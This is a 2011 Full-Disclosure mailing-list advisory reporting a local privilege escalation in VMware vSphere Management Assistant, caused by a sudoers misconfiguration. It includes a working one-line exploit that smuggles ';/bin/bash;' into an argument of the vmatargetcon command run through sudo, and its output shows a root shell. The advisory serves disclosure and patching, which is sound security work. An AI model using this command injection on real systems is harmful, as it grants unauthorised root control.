[<prev] [next>] [day] [month] [year] [list]
Message-ID: <382536df3b232024a407453446ac7be6@duszynski.eu>
Date: Mon, 16 May 2011 09:24:13 +0200
From: Piotr Duszynski <piotr@...zynski.eu>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Vmware vSphere Management Assistant (vMA) - Local
Privilege Escalation
=======================================================================
Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation
=======================================================================
Affected Software : Vmware vSphere Management Assistant (vMA)
Severity : Medium
Local/Remote : Local
Author : @drk1wi
[Summary]
Due to an error in the /etc/sudoers file it is possible to run
arbitrary shell commands within the context of root user.
[Vulnerability Details]
[vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash
"'raz';/bin/bash;"
35|ERROR|1|Unable to resolve hostname.
[root@vMA vi-admin]#
[Time-line]
27/04/2010 - Vendor notified
28/04/2010 - Vendor response
??? - Vendor patch release
16/05/2011 - Public disclosure
[Fix Information]
Edit the /etc/sudoers file.
Cheers,
@drk1wi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists